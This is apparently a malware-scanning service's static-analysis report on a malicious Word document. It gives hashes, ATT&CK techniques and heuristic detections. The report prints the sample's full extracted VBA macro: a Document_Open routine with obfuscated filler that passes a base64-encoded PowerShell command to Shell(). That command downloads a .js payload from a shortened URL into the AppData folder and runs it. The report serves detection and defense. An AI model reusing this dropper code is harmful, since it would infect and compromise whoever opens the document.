Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 52caad21679a7299…

MALICIOUS

Office (OOXML)

19.1 KB Created: 2021-05-28 03:46:00 UTC Authoring application: Microsoft Office Word 15.0000 First seen: 2021-06-17
MD5: 1486d228b1e1d0a8903f71427299f29d SHA-1: bf4b2bc9f1a2c166eaaeb503b375ab53309df36e SHA-256: 52caad21679a7299228a977d0085ac8eba040e275ba9bdddd9c8b6e783efcd93
162 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1059 Command and Scripting Interpreter

The sample is an OOXML document containing a VBA project with a Document_Open macro. This macro calls the Shell() function, indicating an attempt to execute an external command or payload. The VBA code is heavily obfuscated, but the presence of the Document_Open macro and the Shell() call strongly suggests a downloader or dropper functionality, aiming to execute a second-stage payload.

Heuristics 5

  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 3170 bytes
SHA-256: 3c6e7dd67a1b636f0fc6719451257f397b003011c549ee63706a995a04c2cc14
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Open()
Call HFvgRkvc
End Sub





Attribute VB_Name = "OGIXLGsLk"

Function CGBsM(pNgKUwEQJ, wvpPBmHiGgORfnz, RFWbmpCuZouEshKAbXTrkcLTLErfsXhsLg, zticGtuqNsDpYVOqHUHDotDPixW)
KGsvMy = 1.70355928665325E+33
mybIOSJdhaXDdqFqTuJWsoGqKdVLIxLIJNBv = "GTeMYUgepjMFPZBDbxyrkylxy"
kOPtPoKOMaeKUTaMVuJF = "XKFhPDDrIhhNDkROvTXuANaYRdfRYdqnsbMEJM"
lHXEtxwQiIxZblLsKjhQmYmTfqtVbYNFjTmmdJhbVMw = "aDPBhjCUcv"
NVDYCDbpKvsqHz = 88592458952#
CGBsM "OBBFuZbdsbarnrWscnGZRZk"
End Function

Function hObbgtiKWjIjZKhgCyedidBXthWIxjNQdpmtdzmNXw(XuWmNiNICIVATWAnmrLxbLnyoCQ, AaHoRX, ADoQJOSpfVVZFmTmaOmCLHYyLSKIbB, jvoAkxaCjJWHcTcKQhngaeUWteqFr, KNeold, mjpzMDspzwfiHubo, HEbSHFHVKfzIdnhyuex)
aXQiSFAwvzTQDMDiyWZNmWsFkXoDCMQGleaAczDCxnR = "JZigZRnqyjMEeLxvR"
tjiMeZmDGyTWPzEbvKoIdlYZICSVVRBIlzthiwuJu = 5.08993129100267E+39
LoXbTMzDPmHJTILIEcGQh = 4.78686816295855E+27
xKlPFWsyQeOHZjBgiGVSBOBbglWZsSCdoWr = "qDGdKRWcvMibGX"
AuPniJJjUASGxbkTDroqfzsHksZgUCuSVZCiYi = 6.90227035784107E+22
DhTmcsLYAKs = 7.01438146604038E+29
jSgOBCIDqkcPRFAkYZCuUilJLMPP = 94352671774#
TYVbXLAoLAgQfTTEEVXraAa = "yKBgXCpmte"
LGotuzwNYWepOSFHqsXyS = 6.13751259384119E+35
NcMJURILuWBwHxPcdsdmCmTVmOSvytWfENtLgkffFM = 2.61194760418261E+24
hObbgtiKWjIjZKhgCyedidBXthWIxjNQdpmtdzmNXw "HoSKHrOPeVgvbIrWFyNMAAVst"
End Function

Sub piEPtmHORHZnYLBGfLYshYGyGGpRnNsfEJR(DvsMyhp, MhUDKDkerKX, SDpOagrAbHSaQDoTW, WzGQwJCBoKcVJLUbm, FemS)
ruJOgvKNjYwPktZTOaHQcGInxqbDPu = "OuTOkCJLmNsOiKZgunZQdCAFlmVRqUH"
pohVRfpQEOVDkradYJgPqdFMuNcygsVRGuYucEPOyI = 6.48637504292417E+26
PgwVuLssgnrHM = 3.10513839415424E+20
VaDCqjMtDxpSgBTuRRhRqfxsinozoe = 4.13598659141732E+35
mMLGdLMIYzWcyfb = 650746113518612#
rZmVZZuspcLTDvMFZiCFUupiFIJ = "UDzMHIxaBJoNRTQAA"
FdnRDPcVKwjDQRQdXmdyLuylDPupoBdpiLDgdDz = "kmxAqytXwovdWChKeBOnVmhJSuUENkz"
End Sub


Public Sub HFvgRkvc()
On Error Resume Next
 nuu = "hgfdrtt"
MMM = Right(nuu, 1)
Dim zzfg
zzfg = "Sub" + "jec" + MMM
 NxSHWIje = ActiveDocument.BuiltInDocumentProperties("Comments")
 lOIMUdk = ActiveDocument.BuiltInDocumentProperties(zzfg)
 bWgKRxTLz = "IAAkAGYAZABzAGYAcwBkAGYAIAA9ACAAIgBmAHMA" & _
"ZgBkAGcAaABmAGQAZABmAGcAaAAiADsAIAAoAE4A" & _
"RQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUA" & _
"YABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAA" & _
"aQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwA" & _
"bwBBAGQAZgBJAGwARQAoACAAHSBoAHQAdABwAHMA" & _
"OgAvAC8AYgBpAHQALgBsAHkALwAzAHUAcwA4AGQA" & _
"MgBoAB0gIAAsACAAHSAkAEUATgB2ADoAYQBwAHAA" & _
"ZABhAHQAYQBcAG0AZwB5AHEAbgBiAGUAZAAuAGoA" & _
"cwAdICAAKQAgADsAIABzAHQAQQBSAHQAIAAdICQA" & _
"RQBOAHYAOgBhAHAAcABkAGEAdABhAFwAbQBnAHkA" & _
"cQBuAGIAZQBkAC4AagBzAB0gOwAkAGYAZABzAGYA" & _
"cwBkAGYAIAA9ACAAIgBmAHMAZgBkAGcAaABmAGQA" & _
"ZABmAGcAaAAiADsA"
 xYpNRRPpI = NxSHWIje + lOIMUdk + " " + bWgKRxTLz
 tbtVDLfZ = Shell(bh54r + xYpNRRPpI, bh54r)
'0000

End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 17408 bytes
SHA-256: 353976c45dd3df0932e39fcd927c1c40a4a977174774b28bc854c22b7eda4f30

Open this report in the interactive analyzer, or submit your own file for analysis.